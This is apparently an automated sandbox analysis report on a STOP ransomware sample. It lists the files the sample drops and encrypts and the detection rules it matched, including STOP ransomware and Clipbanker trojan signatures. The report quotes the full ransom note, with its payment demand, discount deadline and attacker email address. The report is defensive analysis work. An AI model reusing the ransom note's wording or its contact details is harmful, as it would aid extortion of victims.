Source: C:\Users\user\Desktop\SUwX12D2S6.exe File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.0.filtertrie.intermediate.txt -> decryption settings~decrease zoom level~decrease volume~decrease mouse speed~decrease mouse acceleration~decrease brightness~decode~decice~deault~deaf~deafult~ddevice~daylight saving time on or off~davice~dates~date time~date settings~date and time~date and time settings~date and time from a time server~date and time formats~data~data you send to microsoft~data viewer~data usage overview~data to improve narrator~data systemwide~data settings~data sense~data saver~data restore~data plan~data limit~data instead of wifi~data for all apps~data connection with other devices~data captured by windows mixed reality~dark~darker touch feedback~dark theme~dark theme settings~dark mode systemwide~dark mode settings~dark mode for apps~dark colours~dark colors~dafault~c~cutting and pasting~cut and paste~customizing~customize~customize narrator sounds setting~customize narrator sound effects setting~customising~cust Jump to dropped file
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe File dropped: C:\Users\user\AppData\Local\VirtualStore\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe File dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99628250709 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133584208388432054.txt entropy: 7.99847991902 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945563963808.txt entropy: 7.99846217475 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99855212418 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99832343016 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99841911005 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.99841370598 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.99836133867 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt entropy: 7.99841207272 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt entropy: 7.99816184294 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99772127319 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99560202884 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99864335308 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99246831221 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.99874553856 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99868957758 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99756917598 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99714233773 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99633764749 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99193979349 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\setup32.exe_Rules.xml entropy: 7.99855021659 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99573860662 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session entropy: 7.99142819495 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.99275523764 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99374001164 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99301888814 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002b.db entropy: 7.99802000489 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002c.db entropy: 7.99827418765 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000006.db entropy: 7.99663149935 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db entropy: 7.99779143471 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.99201616151 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99706974284 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99428171001 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99805802398 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\webext.sc.lz4 entropy: 7.9986222777 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a791065b-313d-479b-9caf-5d69eec92f14}\0.0.filtertrie.intermediate.txt entropy: 7.99462178952 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\0.0.filtertrie.intermediate.txt entropy: 7.9949854717 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\Apps.ft entropy: 7.99654187209 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ab5125af-4ee0-4e4b-8c28-9658b46f5799}\Apps.ft entropy: 7.99645503924 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ab5125af-4ee0-4e4b-8c28-9658b46f5799}\0.0.filtertrie.intermediate.txt entropy: 7.99502735899 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a791065b-313d-479b-9caf-5d69eec92f14}\Apps.ft entropy: 7.99635421801 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingssynonyms.txt entropy: 7.99843187839 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsglobals.txt entropy: 7.99606350138 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\override_list.pb.gz entropy: 7.99874740851 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.ico entropy: 7.99843460958 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.ico entropy: 7.99878515892 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25\model.tflite entropy: 7.99691303199 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Docs.ico entropy: 7.99864081651 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Slides.ico entropy: 7.99879366822 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Gmail.ico entropy: 7.99900376495 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.ico entropy: 7.99878723474 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js entropy: 7.9977266083 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html entropy: 7.99839179617 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.bgzq (copy) entropy: 7.99714233773 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.bgzq (copy) entropy: 7.99633764749 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.bgzq (copy) entropy: 7.99193979349 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Microsoft\Office\16.0\setup32.exe_Rules.xml.bgzq (copy) entropy: 7.99855021659 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.bgzq (copy) entropy: 7.99573860662 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.session.bgzq (copy) entropy: 7.99142819495 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.bgzq (copy) entropy: 7.99275523764 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.bgzq (copy) entropy: 7.99374001164 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.bgzq (copy) entropy: 7.99301888814 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002b.db.bgzq (copy) entropy: 7.99802000489 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002c.db.bgzq (copy) entropy: 7.99827418765 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000006.db.bgzq (copy) entropy: 7.99663149935 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db.bgzq (copy) entropy: 7.99779143471 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.bgzq (copy) entropy: 7.99201616151 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.bgzq (copy) entropy: 7.99706974284 Jump to dropped file
Source: C:\Users\user\Desktop\SUwX12D2S6.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.bgzq (copy) entropy: 7.99839179617 Jump to dropped file
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199673019888[1].htm entropy: 7.99474261176 Jump to dropped file

System Summary

barindex
Source: 19.2.mstsca.exe.8515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 19.2.mstsca.exe.8515a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 16.2.build3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 19.2.mstsca.exe.8515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 19.2.mstsca.exe.8515a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 10.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 10.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 10.2.build3.exe.8115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 10.2.build3.exe.8115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 25.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 25.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 24.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 25.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0.2.SUwX12D2S6.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.SUwX12D2S6.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.SUwX12D2S6.exe.5e615a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.SUwX12D2S6.exe.5e615a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.SUwX12D2S6.exe.5e115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.SUwX12D2S6.exe.5e115a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.SUwX12D2S6.exe.5ed15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.SUwX12D2S6.exe.5ed15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.2.SUwX12D2S6.exe.5e715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.SUwX12D2S6.exe.5e715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.SUwX12D2S6.exe.5ed15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.SUwX12D2S6.exe.5ed15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.SUwX12D2S6.exe.5e615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.SUwX12D2S6.exe.5e615a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.SUwX12D2S6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.2.SUwX12D2S6.exe.5e715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.SUwX12D2S6.exe.5e715a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.SUwX12D2S6.exe.5de15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.SUwX12D2S6.exe.5de15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.SUwX12D2S6.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
